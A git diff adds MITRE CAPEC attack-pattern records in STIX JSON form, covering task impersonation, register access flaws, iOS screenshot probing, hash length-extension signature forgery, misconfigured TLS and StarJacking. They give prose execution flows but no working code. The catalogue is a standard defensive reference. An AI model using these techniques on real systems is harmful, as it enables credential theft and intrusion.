"source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1272.html" + }, + { + "external_id": "CWE-1278", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1278.html" + }, + { + "external_id": "CWE-1323", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1323.html" + }, + { + "external_id": "CWE-1258", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1258.html" + }, + { + "external_id": "CWE-1330", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1330.html" + }, + { + "description": "Data from Local System", + "external_id": "T1005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1005" + }, + { + "description": "Credentials from Password Stores:Keychain", + "external_id": "T1555.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1555/001" + } + ], + "id": "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Pull Data from System Resources", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--9d08b257-08f6-42e3-ad7e-41aaf07789a1", + "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95" + ], + "x_capec_child_of_refs": [ + "attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6" + ], + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--1b75b059-c9ee-4c4d-b016-bafb20cce96b", + "attack-pattern--ed3de4d7-a053-42e4-9f3d-3a6293034e96", + "attack-pattern--a7ed6b37-4ede-4c34-bbb2-c422fb844d74", + "attack-pattern--9a7492fa-b46e-48bc-aae9-beb1d359171e" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1995c522-a25d-46e4-b024-65172771a692.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1995c522-a25d-46e4-b024-65172771a692.json new file mode 100644 index 0000000000000000000000000000000000000000..590f4788a0de04ca00727745a1860271efe6aa65 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1995c522-a25d-46e4-b024-65172771a692.json @@ -0,0 +1,83 @@ +{ + "id": "bundle--2a9f2807-2288-4e5f-9060-99b0743a55a1", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, through a previously installed malicious application, impersonates an expected or routine task in an attempt to steal sensitive information or leverage a user's privileges.", + "external_references": [ + { + "external_id": "CAPEC-504", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/504.html" + }, + { + "external_id": "CWE-1021", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1021.html" + }, + { + "description": "Masquerading: Masquerade Task or Service", + "external_id": "T1036.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1036/004" + }, + { + "description": "Adrienne Porter Felt, David Wagner, Phishing on Mobile Devices, 2011, University of California, Berkeley", + "external_id": "REF-434", + "source_name": "reference_from_CAPEC", + "url": "https://people.eecs.berkeley.edu/~daw/papers/mobphish-w2sp11.pdf" + } + ], + "id": "attack-pattern--1995c522-a25d-46e4-b024-65172771a692", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Task Impersonation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--fc3a9a6f-66c9-4363-8ebd-9bd18725fff8" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An adversary monitors the system task list for Microsoft Outlook in an attempt to determine when the application may prompt the user to enter their credentials to view encrypted email. Once the task is executed, the adversary impersonates the credential prompt to obtain the user's Microsoft Outlook encryption credentials. These credentials can then be leveraged by the adversary to read a user's encrypted email.", + "An adversary prompts a user to authorize an elevation of privileges, implying that a background task needs additional permissions to execute. The user accepts the privilege elevation, allowing the adversary to execute additional malware or tasks with the user's privileges." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine suitable tasks to exploit: Determine what tasks exist on the target system that may result in a user providing sensitive information.

    2. Techniques
    Determine what tasks prompt a user for their credentials.
    Determine what tasks may prompt a user to authorize a process to execute with elevated privileges.

Exploit

  1. Impersonate Task: Impersonate a legitimate task, either expected or unexpected, in an attempt to gain user credentials or to ride the user's privileges.

    2. Techniques
    Prompt a user for their credentials, while making the user believe the credential request is legitimate.
    Prompt a user to authorize a task to run with elevated privileges, while making the user believe the request is legitimate.
", + "x_capec_extended_description": "\n When impersonating an expected task, the adversary monitors the task list maintained by the operating system and waits for a specific legitimate task to become active. Once the task is detected, the malicious application launches a new task in the foreground that mimics the user interface of the legitimate task. At this point, the user thinks that they are interacting with the legitimate task that they started, but instead they are interacting with the malicious application. Once the adversary's goal is reached, the malicious application can exit, leaving the original trusted application visible and the appearance that nothing out of the ordinary has occurred.\n A second approach entails the adversary impersonating an unexpected task, but one that may often be spawned by legitimate background processes. For example, an adversary may randomly impersonate a system credential prompt, implying that a background process requires authentication for some purpose. The user, believing they are interacting with a legitimate task, enters their credentials or authorizes the use of their stored credentials, which the adversary then leverages for nefarious purposes. This type of attack is most often used to obtain sensitive information (e.g., credentials) from the user, but may also be used to ride the user's privileges.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--f7a0e7bd-d24a-4390-b365-9e71f22e4e06" + ], + "x_capec_prerequisites": [ + "The adversary must already have access to the target system via some means.", + "A legitimate task must exist that an adversary can impersonate to glean credentials.", + "The user's privileges allow them to execute certain tasks with elevated privileges." + ], + "x_capec_resources_required": [ + "Malware or some other means to initially comprise the target system.", + "Additional malware to impersonate a legitimate task." + ], + "x_capec_skills_required": { + "Low": "Once an adversary has gained access to the target system, impersonating a task is trivial." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--19f01fde-7707-4938-afb5-daa22bf8c93f.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--19f01fde-7707-4938-afb5-daa22bf8c93f.json new file mode 100644 index 0000000000000000000000000000000000000000..d258fcac76c0bf57c8dcbf16c76aea81d0f7b510 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--19f01fde-7707-4938-afb5-daa22bf8c93f.json @@ -0,0 +1,29 @@ +{ + "id": "bundle--588b29c5-0fe5-4fda-a109-8e91ec1b71a3", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated. Please refer to CAPEC:30 - Hijacking a Privileged Thread of Execution.", + "external_references": [ + { + "external_id": "CAPEC-235", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/235.html" + } + ], + "id": "attack-pattern--19f01fde-7707-4938-afb5-daa22bf8c93f", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Implementing a callback to system routine (old AWT Queue)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810.json new file mode 100644 index 0000000000000000000000000000000000000000..0a70eb1beb15140002e643a8507c9651d03014e1 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810.json @@ -0,0 +1,89 @@ +{ + "id": "bundle--636f8208-f395-47ef-8d5d-e75c55cd081c", + "objects": [ + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary exploits missing or incorrectly configured access control within registers to read/write data that is not meant to be obtained or modified by a user.\n ", + "external_references": [ + { + "external_id": "CAPEC-680", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-1224", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1224.html" + }, + { + "external_id": "CWE-1231", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1231.html" + }, + { + "external_id": "CWE-1233", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1233.html" + }, + { + "external_id": "CWE-1262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1262.html" + }, + { + "external_id": "CWE-1283", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1283.html" + }, + { + "description": "Brandon Hill, Huge Intel CPU Bug Allegedly Causes Kernel Memory Vulnerability With Up To 30% Performance Hit In Windows And Linux, 2018--01---02, David Altavilla and Hot Hardware, Inc", + "external_id": "REF-693", + "source_name": "reference_from_CAPEC", + "url": "https://hothardware.com/news/intel-cpu-bug-kernel-memory-isolation-linux-windows-macos" + } + ], + "id": "attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Exploitation of Improperly Controlled Registers", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--92cdcd3d-d734-4442-afc3-4599f261498b", + "attack-pattern--aac17300-6cdd-4f50-82c3-da5a01d225ac" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Hardware", + "Hardware" + ], + "x_capec_example_instances": [ + "\n During a System-on-Chip's (SoC) secure boot process, the code to be authenticated is measured to determine the code's validity. This entails the one-way hash of the code binary being calculated and extended to the previous hash. The value obtained after completion of the boot flow is then stored in a register with the intent of later verifying this value to determine if the boot flow has been tampered with. However, the register being used does not prevent an adversary from modifying the register's contents, which can result in the adversary spoofing the measurement data used in the attestation process.\n " + ], + "x_capec_extended_description": "\n Hardware systems often utilize trusted lock bits to prevent a set of registers from being written to or to restrict a register to only being written to once. Registers are also frequently used to store sensitive data leveraged in additional security operations, such as secure booting, authenticating code, device attestation, and more. However, the access control mechanisms meant to protect these registers may be fully missing or ineffective due to misconfiguration. If an adversary is able to discover improper access controls surrounding registers, it could result in the adversary obtaining sensitive data and/or modifying data that is meant to be immutable. This can ultimately result in processes like secure boot being circumvented or in protected configurations being modified.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Awareness of the hardware being leveraged.", + "Access to the hardware being leveraged." + ], + "x_capec_skills_required": { + "High": "Intricate knowledge of registers." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1b75b059-c9ee-4c4d-b016-bafb20cce96b.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1b75b059-c9ee-4c4d-b016-bafb20cce96b.json new file mode 100644 index 0000000000000000000000000000000000000000..fe1b67ca07fbb46c53edd17e2569bbb262f93ca0 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1b75b059-c9ee-4c4d-b016-bafb20cce96b.json @@ -0,0 +1,49 @@ +{ + "id": "bundle--c2028186-466a-483d-a7f6-4e08e4c476e5", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary examines screenshot images created by iOS in an attempt to obtain sensitive information. This attack targets temporary screenshots created by the underlying OS while the application remains open in the background.", + "external_references": [ + { + "external_id": "CAPEC-498", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/498.html" + }, + { + "external_id": "CWE-359", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/359.html" + }, + { + "description": "Jonathan Zdziarksi, Hacking and Securing iOS Applications (First Edition), 2012, O'Reilly Media, Inc.", + "external_id": "REF-426", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--1b75b059-c9ee-4c4d-b016-bafb20cce96b", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Probe iOS Screenshots", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "These images are used by iOS to aid in the visual transition between open applications and improve the user's experience with a device. An application can be at risk even if it properly protects sensitive information when at rest. If the application displays sensitive information on the screen, then the potential exists for iOS to unintentionally record that information in an image file. An adversary can retrieve these images either by gaining access to the image files, or by physically obtaining the device and leveraging the multitasking switcher interface. This attack differs from CAPEC-648, which targets intentional screenshots initiated by an end-user that are stored in the device's storage.", + "x_capec_prerequisites": [ + "This type of an attack requires physical access to a device to either excavate the image files (potentially by leveraging a Jailbreak) or view the screenshots through the multitasking switcher (by double tapping the home button on the device)." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1bc4fd64-65a6-41d4-ac68-8e3692eabe29.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1bc4fd64-65a6-41d4-ac68-8e3692eabe29.json new file mode 100644 index 0000000000000000000000000000000000000000..c406bf33fb66e5a99baea9a26457826dfd88e149 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1bc4fd64-65a6-41d4-ac68-8e3692eabe29.json @@ -0,0 +1,71 @@ +{ + "id": "bundle--6434e7d1-ebde-47e1-93b8-51164cc526b0", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary utilizes a hash function extension/padding weakness, to modify the parameters passed to the web service requesting authentication by generating their own call in order to generate a legitimate signature hash (as described in the notes), without knowledge of the secret token sometimes provided by the web service.", + "external_references": [ + { + "external_id": "CAPEC-461", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/461.html" + }, + { + "external_id": "CWE-328", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/328.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "description": "Thai Duong, Juliano Rizzo, Flickr's API Signature Forgery Vulnerability, 2009--09---28", + "external_id": "REF-398", + "source_name": "reference_from_CAPEC", + "url": "http://netifera.com/research/flickr_api_signature_forgery.pdf" + } + ], + "id": "attack-pattern--1bc4fd64-65a6-41d4-ac68-8e3692eabe29", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Web Services API Signature Forgery Leveraging Hash Function Extension Weakness", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "To leverage an attack against the has function extension / padding weakness, consider the message to be passed to the web service is M (this message includes the parameters passed to the web service concatenated with the secret token / key bytes). The message M is hashed and that hash is passed to the web service and is used for authentication. The attacker does not know M, but can see Hash (M) and Length (M). The attacker can then compute Hash (M || Padding (M) || M') for any M'. The attacker does not know the entire message M, specifically the attacker does not know the secret bytes, but that does not matter. The attacker is still able to sign their own message M' and make the called web service verify the integrity of the message without an error." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find a vulnerable web service: The adversary finds a web service that uses a vulnerable authentication scheme, where an authentication token is concatenated with the parameters of a request and then hashed

    2. Techniques
    Read application documentation to learn about authentication schemes being used
    Observe web service traffic to look for vulnerable authentication schemes

Experiment

  1. Attempt adding padding to parameters: An adversary tests if they can simply add padding to the parameters of a request such that the request is technically changed, with the hash remaining the same

    2. Techniques
    Exploit the hash function extension / padding weakness with only padding to test the weakness

Exploit

  1. Add malicious parameters to request: Add malicious parameters to a captured request in addition to what is already present. Do this by exploiting the padding weakness of the hash function and send the request to the web service so that it believes it is authenticated and acts on the extra parameters.

    2. Techniques
    Exploit the hash function extension / padding weakness by adding malicious parameters to a web service request such that it is still deemed authentic
", + "x_capec_extended_description": "\n When web services require callees to authenticate, they sometimes issue a token / secret to the caller that the caller is to use to sign their web service calls. In one such scheme the caller, when constructing a request, would concatenate all of the parameters passed to the web service with the provided authentication token and then generate a hash of the concatenated string (e.g., MD5, SHA1, etc.). That hash then forms the signature that is passed to the web service which is used on the server side to verify the origin authenticity and integrity of the message. Because of the iterative design of the hash function, it is possible, from only the hash of a message and its length, for an adversary to conduct signature forgery by computing the hash of longer messages that start with the initial message and include the padding required for the initial message to reach a multiple of 512 bits. It is important to note that the attack not limited to MD5 and will work on other hash functions such as SHA1.\n ", + "x_capec_prerequisites": [ + "Web services check the signature of the API calls", + "Authentication tokens / secrets are shared between the server and the legitimate client", + "The API call signature is generated by concatenating the parameter list with the shared secret and hashing the result.", + "An iterative hash function like MD5 and SHA1 is used.", + "An attacker is able to intercept or in some other way gain access to the information passed between the legitimate client and the server in order to retrieve the hash value and length of the original message.", + "The communication channel between the client and the server is not secured via channel security such as TLS" + ], + "x_capec_resources_required": [ + "\n Access to a function to produce a hash (e.g., MD5, SHA1)\n Tools that allow the attacker to intercept a message between the client and the server, specifically the hash that is the signature and the length of the original message concatenated with the secret bytes\n " + ], + "x_capec_skills_required": { + "Medium": "Medium level of cryptography knowledge, specifically how iterative hash functions work. This is needed to select proper padding." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1be52fc4-a498-4d01-9a68-b560e64e0abf.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1be52fc4-a498-4d01-9a68-b560e64e0abf.json new file mode 100644 index 0000000000000000000000000000000000000000..00843a03e69bd3e765151b4b10f6346c885c0df3 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1be52fc4-a498-4d01-9a68-b560e64e0abf.json @@ -0,0 +1,67 @@ +{ + "id": "bundle--f00cf944-e2b2-4c96-9229-e5db9e6b4908", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary takes advantage of incorrectly configured SSL/TLS communications that enables access to data intended to be encrypted. The adversary may also use this type of attack to inject commands or other traffic into the encrypted stream to cause compromise of either the client or server.", + "external_references": [ + { + "external_id": "CAPEC-217", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/217.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + } + ], + "id": "attack-pattern--1be52fc4-a498-4d01-9a68-b560e64e0abf", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Exploiting Incorrectly Configured SSL/TLS", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--861cfb48-ba7c-4568-86c9-43ac6985ac65" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_example_instances": [ + "Using MITM techniques, an adversary launches a blockwise chosen-boundary attack to obtain plaintext HTTP headers by taking advantage of an SSL session using an encryption protocol in CBC mode with chained initialization vectors (IV). This allows the adversary to recover session IDs, authentication cookies, and possibly other valuable data that can be used for further exploitation. Additionally this could allow for the insertion of data into the stream, allowing for additional attacks (CSRF, SQL inject, etc) to occur." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine SSL/TLS Configuration: Determine the SSL/TLS configuration of either the server or client being targeted, preferably both. This is not a hard requirement, as the adversary can simply assume commonly exploitable configuration settings and indiscriminately attempt them.

    2. Techniques
    If the target is a webpage, some of the SSL/TLS configuration can be viewed through the browser's security information, such as the key sizes and cipher being used.

Experiment

  1. Intercept Communication: Provide controlled access to the server by the client, by either providing a link for the client to click on, or by positioning one's self at a place on the network to intercept and control the flow of data between client and server, e.g. AiTM (adversary in the middle - CAPEC-94).

    2. Techniques
    Create a malicious webpage that looks identical to the target webpage, but routes client traffic to the server such that the adversary can observe the traffic and perform an adverary in the middle attack.
    If the adversary has access to the network that either the client or server is on, the can attempt to use a packet sniffer to perform an adversary in the middle attack.
    Install a packet sniffer through malware directly to a client device that can intercept SSL/TLS traffic and perform an adversary in the middle attack.

Exploit

  1. Capture or Manipulate Sensitive Data: Once the adversary has the ability to intercept the secure communication, they exploit the incorrectly configured SSL to view the encrypted communication. The adversary can choose to just record the secure communication or manipulate the data to achieve a desired effect.

    2. Techniques
    Use known exploits for old SSL and TLS versions.
    Use known exploits for weak ciphers such as DES and RC4.
", + "x_capec_extended_description": "SSL/TLS communications become vulnerable to this attack when they use outdated versions and insecure ciphers. Currently, all SSL versions are deprecated and TLS versions 1.0 and 1.1 are also deprecated due to being insecure. It is still possible for later versions of TLS to be insecure if they are configured with insecure ciphers such as 3DES or RC4.", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Access to the client/server stream." + ], + "x_capec_resources_required": [ + "The adversary needs the ability to sniff traffic, and optionally be able to route said traffic to a system where the sniffing of traffic can take place, and act upon the recovered traffic in real time." + ], + "x_capec_skills_required": { + "High": "The adversary needs real-time access to network traffic in such a manner that the adversary can grab needed information from the SSL stream, possibly influence the decided-upon encryption method and options, and perform automated analysis to decipher encrypted material recovered. Tools exist to automate part of the tasks, but to successfully use these tools in an attack scenario requires detailed understanding of the underlying principles." + }, + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1c4b22ea-6dfc-4a95-917e-a7f11f3d34eb.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1c4b22ea-6dfc-4a95-917e-a7f11f3d34eb.json new file mode 100644 index 0000000000000000000000000000000000000000..9619832f6b37f2e1150ac15cc354925e906364f2 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1c4b22ea-6dfc-4a95-917e-a7f11f3d34eb.json @@ -0,0 +1,29 @@ +{ + "id": "bundle--b5f5521c-c5df-4f38-a4fd-3bd5ed5a5289", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-448 : Embed Virus into DLL. Please refer to this other pattern going forward.", + "external_references": [ + { + "external_id": "CAPEC-450", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/450.html" + } + ], + "id": "attack-pattern--1c4b22ea-6dfc-4a95-917e-a7f11f3d34eb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "DEPRECATED: Malware Propagation via USB U3 Autorun", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1c976e18-0d56-40b0-9168-90402604c16d.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1c976e18-0d56-40b0-9168-90402604c16d.json new file mode 100644 index 0000000000000000000000000000000000000000..31bfe47da826ae1787b2726e162814b073ce6eb2 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1c976e18-0d56-40b0-9168-90402604c16d.json @@ -0,0 +1,79 @@ +{ + "id": "bundle--953e701a-0442-477d-be02-d81ca629f9b5", + "objects": [ + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary spoofs software popularity metadata to deceive users into believing that a maliciously provided package is widely used and originates from a trusted source.\n ", + "external_references": [ + { + "external_id": "CAPEC-693", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/693.html" + }, + { + "external_id": "CWE-494", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/494.html" + }, + { + "description": "Tzachi Zornstein, StarJacking – Making Your New Open Source Package Popular in a Snap, 2022--04---19, Checkmarx", + "external_id": "REF-721", + "source_name": "reference_from_CAPEC", + "url": "https://checkmarx.com/blog/starjacking-making-your-new-open-source-package-popular-in-a-snap/" + } + ], + "id": "attack-pattern--1c976e18-0d56-40b0-9168-90402604c16d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "StarJacking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6ed35753-d365-4be2-a044-2fcc6e191b5a" + ], + "x_capec_consequences": { + "Access_Control": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Accountability": [ + "Hide Activities" + ], + "Authorization": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "In April 2022, Checkmarx reported that packages hosted on NPM, PyPi, and Yarn do not properly validate that the provided GitHub repository URL actually pertains to the package being provided. Combined with additional attacks such as TypoSquatting, this allows adversaries to spoof popularity metadata by associating popular GitHub repository URLs with the malicious package. This can further lead to developers unintentionally including the malicious package within their development environments [REF-721]." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target: The adversary must first identify a target package whose popularity statistics will be leveraged. This will be a popular and widely used package, as to increase the perceived pedigree of the malicious package.

Experiment

  1. Spoof package popularity: The adversary provides their malicious package to a package manager and uses the source code repository URL identified in Step 1 to spoof the popularity of the package. This malicious package may also closely resemble the legitimate package whose statistics are being utilized.

Exploit

  1. Exploit victims: The adversary infiltrates development environments with the goal of conducting additional attacks.

    2. Techniques
    Active: The adversary attempts to trick victims into downloading the malicious package by means such as phishing and social engineering.
    Passive: The adversary waits for victims to download and leverage the malicious package.
", + "x_capec_extended_description": "\n Many open-source software packages are hosted via third-party package managers (e.g., Node Package Manager, PyPi, Yarn, etc.) that allow for easy integration of software components into existing development environments. A package manager will typically include various metadata about the software and often include a link to the package's source code repository, to assist developers in determining the trustworthiness of the software. One common statistic used in this decision-making process is the popularity of the package. This entails checking the amount of \"Stars\" the package has received, which the package manager displays based on the provided source code repository URL. However, many package managers do not validate the connection between the package and source code repository being provided. Adversaries can thus spoof the popularity statistic of a malicious package by associating a popular source code repository URL with the package. This can ultimately trick developers into unintentionally incorporating the malicious package into their development environment.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Identification of a popular open-source package whose popularity metadata is to be used for the malicious package." + ], + "x_capec_skills_required": { + "Low": "Ability to provide a package to a package manager and associate a popular package's source code repository URL." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1cc991f7-9f62-4e6b-9e37-70fa23ab23e9.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1cc991f7-9f62-4e6b-9e37-70fa23ab23e9.json new file mode 100644 index 0000000000000000000000000000000000000000..01e517aaeea13041bc2528c111ef35cc613cc877 --- /dev/null +++ 